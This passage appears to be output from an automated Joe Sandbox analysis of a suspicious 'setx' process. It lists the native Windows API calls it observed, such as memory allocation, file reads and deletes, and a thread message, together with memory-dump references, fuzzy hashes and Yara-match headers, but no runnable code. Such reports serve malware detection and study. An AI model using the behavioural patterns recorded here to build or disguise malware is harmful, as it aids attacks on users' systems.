                        • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00438018
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileRead
                        • String ID:
                        • API String ID: 2738559852-0
                        • Opcode ID: 7b97b7200c014d16e772c4eeea5afa19c938df1b217401ec50f4c5ca143c3311
                        • Instruction ID: 7dd67ec92753483d8ae31a4d9adae83c448ae50412d037f6446b827265eba99a
                        • Opcode Fuzzy Hash: 7b97b7200c014d16e772c4eeea5afa19c938df1b217401ec50f4c5ca143c3311
                        • Instruction Fuzzy Hash: 8E31E8B5A00209AFDB14DF99D881EEFB7B9EF8C314F11810EF919A7340D674A8518BA5
                        APIs
                        • NtAllocateVirtualMemory.NTDLL(00421AAB,?,00436E97,00000000,00000004,00003000,?,?,?,?,?,00436E97,00421AAB,00421AAB,00000000,?), ref: 004382BD
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID:
                        • API String ID: 2167126740-0
                        • Opcode ID: 9c156b13dc7385ad9f595c4b33052ab10ff97d24bc30979311ca6841c05a136b
                        • Instruction ID: 1e211a3d9ad5bc5236c6bdd5873a3d076a346dcad88513f0cadc27eddf66ea79
                        • Opcode Fuzzy Hash: 9c156b13dc7385ad9f595c4b33052ab10ff97d24bc30979311ca6841c05a136b
                        • Instruction Fuzzy Hash: A02127B1A00209ABDB14DF99DC81FABB7B9EF88704F10810EFD19A7340D674A8518BA5
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: DeleteFile
                        • String ID:
                        • API String ID: 4033686569-0
                        • Opcode ID: 3be2dc535e3fb99acdb798e7d55ab67b82f9b61835c56effe6230f2ff84682c9
                        • Instruction ID: 8bb6792db8b4c84cbd5239693ce50071cb63a80c63cf58c8d41ab76859fd73b0
                        • Opcode Fuzzy Hash: 3be2dc535e3fb99acdb798e7d55ab67b82f9b61835c56effe6230f2ff84682c9
                        • Instruction Fuzzy Hash: 0001A1716403047BD610EAA5DC42FEBB3ACEF89714F00410EFA19A7281D6B5795187A5
                        APIs
                        • NtClose.NTDLL(00430F2D,?,00000000,004232CB,?,00430F2D,004232CB,0000008F,?,?,?,?,?,?,?,00434636), ref: 004380E7
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: 63220fd5df8f3df6bacf692bfccfadad601a0f4eb739565101b61f2d2ceb0b5f
                        • Instruction ID: 5c4ad17ae407fe2ac8f426d28e51eb09909b9fe73817bf2787259616eddc6f9f
                        • Opcode Fuzzy Hash: 63220fd5df8f3df6bacf692bfccfadad601a0f4eb739565101b61f2d2ceb0b5f
                        • Instruction Fuzzy Hash: 5EE08C362006047BE620EB6ADC06FDB776CEFC5B65F01405AFA0DA7242D6B1B90187F8
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: e7dfd4ed554a121d730d8b6a6877a3db456af472548d40c6cb13b31988e50d97
                        • Instruction ID: 743146c175fbefac7b78938ed5c57c94a0402f5558002492d1f1223127d817ab
                        • Opcode Fuzzy Hash: e7dfd4ed554a121d730d8b6a6877a3db456af472548d40c6cb13b31988e50d97
                        • Instruction Fuzzy Hash: 049002B1645800129140715848C8557400597E0701B55C111E4424554D8A158A5A5361
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 36dd21acca2ba944f5df8765bef93db090b8130492eaeb4575c9508b288e8b44
                        • Instruction ID: 8690680f5bc551ce3affd667144f69207b0c33f2200e4f7604ef292343608b9e
                        • Opcode Fuzzy Hash: 36dd21acca2ba944f5df8765bef93db090b8130492eaeb4575c9508b288e8b44
                        • Instruction Fuzzy Hash: 089002E164150042414071584848417600597E1701395C215A4554560D861989599269
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 75593c4e986431cbce13cdff1ddffffcde1b048c7ee71ac9a8addcd06764f004
                        • Instruction ID: 5235873462044b3bb4fea47176b8a7d45f271a6a5c36c80fbf7338b0b8c3de6d
                        • Opcode Fuzzy Hash: 75593c4e986431cbce13cdff1ddffffcde1b048c7ee71ac9a8addcd06764f004
                        • Instruction Fuzzy Hash: 559004F5351400030105F55C074C5170047C7D5751355C131F5015550DD733CD755131
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: e6c49a4597d7af66a5ce2797f0e3aa3131d2f24d24d81b45a50fb86979e40c20
                        • Instruction ID: 3727fabea78eb162829406fd53687d3eaa69929dcfa5bc874262db742f4b88d4
                        • Opcode Fuzzy Hash: e6c49a4597d7af66a5ce2797f0e3aa3131d2f24d24d81b45a50fb86979e40c20
                        • Instruction Fuzzy Hash: E99002A5261400020145B558064851B044597D6751395C115F5416590DC62289695321
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 2ec9dee552b6cd9572f641a017306677e596f213ca97ae16ce1f5dbc5005adb2
                        • Instruction ID: 169610cf049c808415ad3040a807872fb0ae1f3c329d9584ac00774683e93992
                        • Opcode Fuzzy Hash: 2ec9dee552b6cd9572f641a017306677e596f213ca97ae16ce1f5dbc5005adb2
                        • Instruction Fuzzy Hash: E49002B124544842D14071584448A57001587D0705F55C111A4064694E96268E59B661
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: b0b92b1bceec6365a53941987d2fe3f967ed8d737314508feba7dbda7c541928
                        • Instruction ID: 4cfbfd1ba81f714654badf3a93dfb67b916fe2388247174974be3a5b29605eb0
                        • Opcode Fuzzy Hash: b0b92b1bceec6365a53941987d2fe3f967ed8d737314508feba7dbda7c541928
                        • Instruction Fuzzy Hash: 079002B124140802D1807158444865B000587D1701F95C115A4025654ECA168B5D77A1
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 334992a745c4741bf2a052d1183c3ca9a310d9d59270aa3100212a8992dd950b
                        • Instruction ID: a721dd51798e90ba6d020bb04d731725aa0b8bd5de0f86ce8d2479d43ad93cb9
                        • Opcode Fuzzy Hash: 334992a745c4741bf2a052d1183c3ca9a310d9d59270aa3100212a8992dd950b
                        • Instruction Fuzzy Hash: 759002B164540802D15071584458757000587D0701F55C111A4024654E87568B5976A1
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 172e9a393ee3cb18b789c3a175eba475de8e61ea97b6a3e69fc526a286719352
                        • Instruction ID: fdf675f5ed85e867b6850405d9e9963ab910675dfeb5d1038dba3c225aa98330
                        • Opcode Fuzzy Hash: 172e9a393ee3cb18b789c3a175eba475de8e61ea97b6a3e69fc526a286719352
                        • Instruction Fuzzy Hash: F99002E124240003410571584458627400A87E0601B55C121E5014590EC52689956125
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: d678e02bef3e73973be7d9a5647b442e5329e03b4f9bfdaedf8e4bff975f50fc
                        • Instruction ID: 064bb6b1eefedec75836cabe3f340c95218ef0c66bccbc04e98971c804a1f697
                        • Opcode Fuzzy Hash: d678e02bef3e73973be7d9a5647b442e5329e03b4f9bfdaedf8e4bff975f50fc
                        • Instruction Fuzzy Hash: 239002E124180403D14075584848617000587D0702F55C111A6064555F8A2A8D556135
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 70b93965dc6d8bda517f48c50a435986e3ccde95bce1f4446b5bf497483161d0
                        • Instruction ID: 7b3f9734d52605c67229f69720f2c75665f25ad5647ccdedcb6cfdec34a668b6
                        • Opcode Fuzzy Hash: 70b93965dc6d8bda517f48c50a435986e3ccde95bce1f4446b5bf497483161d0
                        • Instruction Fuzzy Hash: C69002A164140502D10171584448627000A87D0641F95C122A5024555FCA268A96A131
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: c0e1a62b062c5928a614e3416bce0b87b97534dd29a9b9744d6761455ccfada3
                        • Instruction ID: 03d8cb6b839a580d1ff08fbc3d5175530cdc84d3675a0ca033e2e1662891c6b9
                        • Opcode Fuzzy Hash: c0e1a62b062c5928a614e3416bce0b87b97534dd29a9b9744d6761455ccfada3
                        • Instruction Fuzzy Hash: 2D9002A1251C0042D20075684C58B17000587D0703F55C215A4154554DC91689655521
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 1655ec8f122b8fc16c3a013017c23f196cd515b50db2f497e58d4e3b4c909d7d
                        • Instruction ID: 4d4b980df26a352002aa4fbb725a0bf496fd46e791d1b12f7f9bf4997e2ffbad
                        • Opcode Fuzzy Hash: 1655ec8f122b8fc16c3a013017c23f196cd515b50db2f497e58d4e3b4c909d7d
                        • Instruction Fuzzy Hash: 769002A1641400424140716888889174005ABE1611755C221A4998550E855A89695665
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: a9838e45b3bd5a8d13582d99b056acd92aba20239c478326375c1e2efe9c3459
                        • Instruction ID: 0690fa4b8598a6488811cefe00192d513a797071a42c4e53b5933fcb012fb523
                        • Opcode Fuzzy Hash: a9838e45b3bd5a8d13582d99b056acd92aba20239c478326375c1e2efe9c3459
                        • Instruction Fuzzy Hash: A99002E138140442D10071584458B170005C7E1701F55C115E5064554E861ACD566126
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: d90d848f1ecf68d18c0864a3f7552224f401c595aabeddbcdaff38d05a7307ad
                        • Instruction ID: 1cd4f9dd55c84ac5ca53c89da06efafb730bc165d29cdce145f4758dd9b44521
                        • Opcode Fuzzy Hash: d90d848f1ecf68d18c0864a3f7552224f401c595aabeddbcdaff38d05a7307ad
                        • Instruction Fuzzy Hash: 599002B124140402D1007598544C657000587E0701F55D111A9024555FC66689956131
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: c1a86643e50013e858e6c39a7b21f365975c416efad313813934470de4ed9f49
                        • Instruction ID: e9e4bc5ecd85fa65dbc5c96375a26f88c4d0e6ddc4b7c6665466063163f269e8
                        • Opcode Fuzzy Hash: c1a86643e50013e858e6c39a7b21f365975c416efad313813934470de4ed9f49
                        • Instruction Fuzzy Hash: 009002B124140842D10071584448B57000587E0701F55C116A4124654E8616C9557521
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: e5a034cdde1c128f9216e1431cdc232a6f72532bca33b87da9cc01b0de63b8f8
                        • Instruction ID: 35e8727beff8cbd7159b8c1e54859347f5d17bc56a63835faadd3770390f5863
                        • Opcode Fuzzy Hash: e5a034cdde1c128f9216e1431cdc232a6f72532bca33b87da9cc01b0de63b8f8
                        • Instruction Fuzzy Hash: 5C9002B124148802D1107158844875B000587D0701F59C511A8424658E869689957121
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 4ff18b6ad7232448740c6515705fdcc155b2d38eb83d7218c89b8b0cef13d76c
                        • Instruction ID: 848427abd4a5788bc16a685b1c53d10fd0ae453654de9c8be789cd9999c355d4
                        • Opcode Fuzzy Hash: 4ff18b6ad7232448740c6515705fdcc155b2d38eb83d7218c89b8b0cef13d76c
                        • Instruction Fuzzy Hash: 159002A1282441525545B1584448517400697E0641795C112A5414950D8527995AD621
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 55bfcdcf552636bc756db7721299e7048e27864871323a7667efe1e5d7ab3f3a
                        • Instruction ID: a06d7854be1b130c922f1866a72f30cbf9e72b072d7f7e07614846bdcf7ebb61
                        • Opcode Fuzzy Hash: 55bfcdcf552636bc756db7721299e7048e27864871323a7667efe1e5d7ab3f3a
                        • Instruction Fuzzy Hash: 979002B124140413D11171584548717000987D0641F95C512A4424558E96578A56A121
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 880c670e809f29f63924961b348678e9e6e86242c0c8abf590bca50777299565
                        • Instruction ID: aff4f584957a071727ad1fac6671ec12618aec9553e7df2bc08ce29d259f1743
                        • Opcode Fuzzy Hash: 880c670e809f29f63924961b348678e9e6e86242c0c8abf590bca50777299565
                        • Instruction Fuzzy Hash: 8D9002A925340002D1807158544C61B000587D1602F95D515A4015558DC916896D5321
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 451f290f88da298823fac601fe21eb57c937bfe519acd9fe5d20105c9b24a36b
                        • Instruction ID: de4eacd6a80e092aaa477031d8730f82b74adb57aa2183afdc26c54b8ffae6ae
                        • Opcode Fuzzy Hash: 451f290f88da298823fac601fe21eb57c937bfe519acd9fe5d20105c9b24a36b
                        • Instruction Fuzzy Hash: C99004F134140003D140715C545C7174005D7F1701F55D111F4414554DDD17CD5F5333
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: a2bd5b1fa313986983e51314660554309d609412dfe99cb5107a4f037a18592b
                        • Instruction ID: 19ec33c2fe51b2e71b9d134be3963983404a6ca68787c6010d0622400556bcbf
                        • Opcode Fuzzy Hash: a2bd5b1fa313986983e51314660554309d609412dfe99cb5107a4f037a18592b
                        • Instruction Fuzzy Hash: 4C9002B164550402D10071584558717100587D0601F65C511A4424568E87968A5565A2
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 83d37c3250e15750d05f02cbabcf09771ba9bcdbcb3e07239a9defdb75627500
                        • Instruction ID: 680712e66243cad12848a6cf9a392d0f4b3474fab59be9157ea37b60819ddffa
                        • Opcode Fuzzy Hash: 83d37c3250e15750d05f02cbabcf09771ba9bcdbcb3e07239a9defdb75627500
                        • Instruction Fuzzy Hash: 3E9002A128545102D150715C44486274005A7E0601F55C121A4814594E855689596221

                        Control-flow Graph (rendered graph not recoverable; legend: Executed / Not Executed): block 420b49-420bbe calls 43a020, 43aa30, 424510, 411410 and 431370, then either reaches 420be0-420be5 or block 420bc0-420bd1, which calls PostThreadMessageW and continues to 420be0-420be5 or via 420bd3-420bdd to 420be0-420be5.
                        APIs
                        • PostThreadMessageW.USER32(y11J94u5t,00000111,00000000,00000000), ref: 00420BCD
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID: y11J94u5t$y11J94u5t
                        • API String ID: 1836367815-1857237950
                        • Opcode ID: 6034b6b914f0d46423d71107867abd6949ba32f05ffc85920bb509cca817bded
                        • Instruction ID: 2edf36dd8f0a2a1a9b695b76ac5fa9aa2af6af79be439a870c19b515155170c0
                        • Opcode Fuzzy Hash: 6034b6b914f0d46423d71107867abd6949ba32f05ffc85920bb509cca817bded
                        • Instruction Fuzzy Hash: 0511C831E4025876EB21ABD19C02FDF7B7C9F41B58F44815AFE047B281D6786A06C7E9

                        Control-flow Graph (rendered graph not recoverable; legend: Executed / Not Executed): block 420b50-420bbe calls 43a020, 43aa30, 424510, 411410 and 431370, then either reaches 420be0-420be5 or block 420bc0-420bd1, which calls PostThreadMessageW and continues to 420be0-420be5 or via 420bd3-420bdd to 420be0-420be5.
                        APIs
                        • PostThreadMessageW.USER32(y11J94u5t,00000111,00000000,00000000), ref: 00420BCD
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
